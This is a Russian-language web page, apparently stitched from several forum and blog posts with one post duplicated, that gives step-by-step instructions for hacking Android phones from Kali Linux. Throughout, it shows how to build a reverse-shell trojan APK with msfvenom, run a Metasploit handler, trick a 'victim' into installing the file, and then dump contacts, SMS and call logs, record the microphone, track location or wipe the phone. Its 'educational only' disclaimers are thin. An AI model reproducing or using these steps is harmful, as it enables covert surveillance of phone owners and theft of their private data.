Как получить доступ к телефону kali linux
Как это происходит?
Мы создаем апк файл на кали и делаем так, чтобы жертва его скачала (ну это здесь описывать не буду, есть гугл). А далле после того как жертва его установит мы получаем доступ к контактам, смс, к терминалу и всем функциям удаленно, в том числе можно делать снимки с камер как с фронтальной, так и с задней.
Итак прежде всего нам нужно знать, локальный хост (хост компа\ноута) с которого мы управлять телефоном
Можно создать апк на одном компе а управлять телефоном с другого, ну это на ваше усмотрение, кому как удобно (главное чтобы на всех был Кали 2.0)
Прописываем в консоли ifconfig и узнаем в wlan0 или eth0 (если вы с вйфйя то wlan0 если с прямого подключения то eth0) наш айпи в локальной сети
В моем случае это будет 192.168.1.117
Дальше зная это мы прописываем:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=4444 R >filename.apk
В домашней директории создастся файл filename.apk который потом установит жервта.
Далее заходим в msfconsole , просто прописывая это в терминале
Дожидаемся и пишем use exploit/multi/handler
Дальше ставим пейлоад set payload android/meterpreter/reverse_tcp
Потом ставим порт set LPORT 4444
так же ставим хост set LHOST 192.168.1.117
Далее запускаем експлойт командой exploit -j -z
Остается теперь сделать так, чтобы человек скачал и установил апк
Когда он это сделает, главное чтобы он оставался в сети через вай фай
Если он отключится то сессия не будет доступна
И еще кое-что
апк не палится вообще, если конечно же не стоит какой то антивирус (у большинства не стоит ничего)
Итак когда он все это сделал у нас в консоли появляется сессия под номером 1
Прописываем sessions -i 1
Этой командой выбираем 1 сессию
И у нас запускается meterpreter
Чтобы просмортеть команды и функции, которые мы можем исполнять на чужом телефоне пропишите help
Ну а я расскажу парочку
можно дампить список контактов командой dump_contacts
можно дампить смс dump_sms
можно дампить историю звонков dump_calllog
И это только малость
Опытный юзер андроида может даже зайти с консоли в рекавери и стереть все данные или сбросить заводские настройки, или закинуть ратник чтобы следить за жертвой вне локальной сети.
На этом все)
ropepop
ropepop
ropepop
Как это происходит?
Мы создаем апк файл на кали и делаем так, чтобы жертва его скачала (ну это здесь описывать не буду, есть гугл). А далле после того как жертва его установит мы получаем доступ к контактам, смс, к терминалу и всем функциям удаленно, в том числе можно делать снимки с камер как с фронтальной, так и с задней.
Итак прежде всего нам нужно знать, локальный хост (хост компа\ноута) с которого мы управлять телефоном
Можно создать апк на одном компе а управлять телефоном с другого, ну это на ваше усмотрение, кому как удобно (главное чтобы на всех был Кали 2.0)
Прописываем в консоли ifconfig и узнаем в wlan0 или eth0 (если вы с вйфйя то wlan0 если с прямого подключения то eth0) наш айпи в локальной сети
В моем случае это будет 192.168.1.117
Дальше зная это мы прописываем:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=4444 R >filename.apk
В домашней директории создастся файл filename.apk который потом установит жервта.
Далее заходим в msfconsole , просто прописывая это в терминале
Дожидаемся и пишем use exploit/multi/handler
Дальше ставим пейлоад set payload android/meterpreter/reverse_tcp
Потом ставим порт set LPORT 4444
так же ставим хост set LHOST 192.168.1.117
Далее запускаем експлойт командой exploit -j -z
Остается теперь сделать так, чтобы человек скачал и установил апк
Когда он это сделает, главное чтобы он оставался в сети через вай фай
Если он отключится то сессия не будет доступна
И еще кое-что
апк не палится вообще, если конечно же не стоит какой то антивирус (у большинства не стоит ничего)
Итак когда он все это сделал у нас в консоли появляется сессия под номером 1
Прописываем sessions -i 1
Этой командой выбираем 1 сессию
И у нас запускается meterpreter
Чтобы просмортеть команды и функции, которые мы можем исполнять на чужом телефоне пропишите help
Ну а я расскажу парочку
можно дампить список контактов командой dump_contacts
можно дампить смс dump_sms
можно дампить историю звонков dump_calllog
И это только малость
Опытный юзер андроида может даже зайти с консоли в рекавери и стереть все данные или сбросить заводские настройки, или закинуть ратник чтобы следить за жертвой вне локальной сети.
На этом все, можно репу)
Открываем Терминал и создаем trojan apk-приложение
Для этого напишите следующую команду:
Шаг второй - Открываем второй терминал
Пока файл создается,откройте второй терминал
Загрузите консоль metasploit, набрав в терминале:
Шаг третий - настройка Listener (слушателя)
После загрузки (потребуется время) загрузите эксплойт с несколькими обработчиками, набрав:
Установите ваш IP в качестве значения LHOST 192.168.0.4
Шаг четвёртый - Exploit!
Пропишите эту команду, чтобы запустить слушателя (listener) :
Скопируйте приложение, которое вы создали (Upgrader.apk) из корневой папки, на Android-телефон.
Затем отправьте его на любой файлообменик (например:)
Запустится консоль meterpreter , с помощью, которой вы можете управлять телефоном, команды для meterpreter, вы с легкостью сможете найти в Интернете , пробуем включить его камеру с помощью одной из таких команд:
Взлом телефона Android звучит очень странно, но здесь наши опытные инструкторы дадут вам лучшие руководства по взлому телефона Android с помощью Kali Linux. Телефоны Android занимают значительную долю на рынке смартфонов. Так что нацеливание на телефон Android - очень хороший вариант, чтобы быстро их взломать. В этом полном руководстве по взлому Android я покажу вам достоинства и недостатки взлома Android. Итак, приступим к взлому телефонов Android с помощью Kali Linux.
Как взломать телефоны Android с помощью Kali Linux 2019
Прежде чем идти изучать как взломать android. Я должен рассказать о Kali Linux, через которую работают эти хаки.
Предупреждение: - Этот совет предназначен для ознакомления с вами и изучения его только в образовательных целях. и не пытайтесь заниматься незаконной деятельностью.
О Kali Linux ?
Kali Linux - это « дистрибутив Linux на основе Debian, разработанный для цифровой криминалистики и тестирования на проникновение ». В Kali Linux есть множество функций, таких как тестирование на проникновение, распространение Linux для этического взлома и т. Д.
Необходимо прочитать: Как создать загрузочный Kali Linux Live USB
Требование:
1. Установлен Kali Linux.
2. Телефон Android.
3. Острый мозг
Примечание. В этом руководстве я использую ноутбук Acer в качестве атакующего ПК с установленной Kali linux, а телефон Coolpad Note 3 Android - в качестве телефона жертвы с Android, чтобы показать вам, как это работает на самом деле.
Шаги:Как взломать телефоны Android с помощью Kali Linux.
Знайте: как установить Kali Linux на Android
msfvenom -p android / meterpreter / reverse_tcp LHOST = 172.16.27.207 R & gt; корень / itechhacks.apk
Взломайте телефоны Android с помощью Kali Linux 1
использовать эксплойт / мульти / обработчик установить полезную нагрузку android / meterpreter / reverse_tcp установить lhost 172.16.27.207 эксплойт
Взломайте телефоны Android с помощью Kali Linux
Читать: Как взломать компьютер с помощью USB-хакерских инструментов
Примечание:
*. Не закрывайте терминал msfconsole.
*. Это только в образовательных целях.
- 100% рабочий взлом пароля учетной записи Facebook 2019
- 12+ самых популярных операционных систем (ОС) для хакеров 2019
- 15+ лучших хакерских приложений для Android в 2019 году
- 12+ лучших каналов YouTube для изучения этического взлома
Подведение итогов: Итак, выше все о том, как легко взломать телефон Android с помощью Kali Linux в 2019 году. Будьте осторожны во время выполнения этого взлома для целей тестирования. Если вы все еще сталкиваетесь с какой-либо проблемой в этом взломе, дайте мне знать в разделе комментариев и не будьте эгоистичны, поделитесь этим постом с друзьями и оставайтесь на связи. «Взломайте телефон Android с помощью Kali Linux»
Обо мне
Смартфон Android часто является шлюзом к большинству коммерческих гаджетов Интернета вещей. Сигнализация Nest Smoke управляется через соответствующее приложение для Android. Так же как и термостат Nest для контроля температуры. Умные замки, камеры дверного звонка - почти ко всем интеллектуальным устройствам можно получить доступ из Alexa или других основных приложений. Что, если кто-то получит удаленный доступ к такому телефону Android? Вы думаете, что это невозможно? Для этого мы дадим базовую демонстрацию того, как "metasploit" Kali Linux можно использовать для создания бэкдора на вашем телефоне Android.
Примечание: это руководство предназначено для исследователей в области безопасности и любителей. Мы не рекомендуем взламывать чьи-либо телефоны без их разрешения.
Задний план
Прежде чем вы начнете работать с Kali Linux, вам сначала необходимо ознакомиться с его консольным терминалом.
На нем легко найти полный список инструментов, предназначенных для прошивки или операционной системы устройства.
Здесь мы воспользуемся одним из распространенных инструментов под названием "MSFVenom", чтобы вставить вирус в телефон Android. Он генерирует несколько видов полезной нагрузки на основе выбранных пользователем параметров. Эксплойт работает на многих платформах, включая Windows, Android, OpenBSD, Solaris, JAVA, PHP и игровое оборудование.
Запуск Android Metasploit
Следующие шаги продемонстрируют, как загрузить MSFVenom в системе Kali Linux.
Запустите терминал и введите следующую команду.
Здесь полезная нагрузка запускается с помощью расширения для эксплойтов под названием "Meterpreter".
Чтобы определить IP-адрес хоста прослушивателя, откройте новый консольный терминал и введите ifconfig . Обычно порт 4444 предназначен для троянов, эксплойтов и вирусов.
После определения IP-адреса вернитесь к предыдущему экрану и введите данные.
Файл "hackand.apk" будет сохранен на рабочем столе и является основным бэкдором, который будет использоваться на телефоне Android.
На следующем этапе запустите "msfconsole", который является распространенным инструментом тестирования на проникновение, используемым с Kali Linux. Для этого введите service postgresql start , а затем msfconsole . PostgreSQL относится к базе данных, в которой хранилась консоль.
Как только инструмент проникновения будет готов, вы можете запустить оставшийся эксплойт.
Затем будет использоваться исполняемый файл с именем "multi-handler".
На изображении ниже показано, как подключить эксплойт к консоли. Будут использоваться те же IP-адрес и номера портов.
На следующем этапе будет запущен и инициализирован эксплойт msfvenom с помощью простой команды exploit . Теперь нам нужно найти цель, которой будет телефон Android.
Подключение терминала Kali Linux к телефону Android
Файл hackand.apk, который мы скачали ранее, имеет размер всего 10 КБ. Вам нужно будет найти способ вставить файл в телефон целевого объекта. Вы можете передать вирус через USB или временную почтовую службу.
Как правило, провайдеры веб-почты, такие как Gmail или Yahoo, отказываются передавать этот зараженный вирусом файл.
Android предупредит вас перед установкой программного обеспечения. Но для завершения установки требуется менее 20 секунд, так как вам нужно только "проигнорировать риск и установить". Это делает угрозу несколько серьезной, если ваш телефон находится в режиме разблокировки.
Как показано здесь, телефону может быть нанесен большой ущерб, включая изменение содержимого хранилища, предотвращение перехода телефона в спящий режим, подключение и отключение от Wi-Fi, установку обоев и многое другое.
После установки APK-файл его можно хитро замаскировать в телефоне.
Теперь вы можете использовать множество команд, подобных приведенным ниже, в терминале Kali Linux для управления телефоном. На самом деле вам не нужно их запоминать, поскольку список доступен из простой опции help в meterpreter .
- record_mic : запись микрофона
- дамп журнала вызовов : получить журнал вызовов
- webcam_chat : начать видеочат.
- geolocate : узнать текущее местоположение телефона.
Большинство современных телефонов Android не позволяют установить это вредоносное приложение. Таким образом, этот эксплойт обычно работает со старыми моделями Android.
Мысли
В этом руководстве мы рассмотрели базовую стратегию использования Kali Linux для получения доступа к смартфону Android. Несмотря на то, что это очень простой эксплойт, он имеет большое значение с точки зрения безопасности Интернета вещей.
Что вы думаете об эксплойтах Kali Linux? Будете ли вы осторожнее относиться к безопасности своего телефона? Дайте нам знать в комментариях.
8 комментариев
Зависание на [*] запущенном обратном обработчике TCP
отлично . но мне непонятно, как вставить этот файл в целевой телефон. Их чистый путь…
См. Последний раздел. Это тест на проникновение, поэтому его цель - выявить потенциальную уязвимость телефона. Единственный способ, которым этот тест будет работать, - это найти разблокированный телефон, в который файл полезной нагрузки (hackand.apk) вставлен вручную или с помощью временной службы электронной почты. Вставка файла займет около 3-5 минут.
у меня не работает, когда троян вставляется, он автоматически закрывается через 30 секунд (сеанс завершился) у вас есть решение для этого? и спасибо всем .
Читайте также: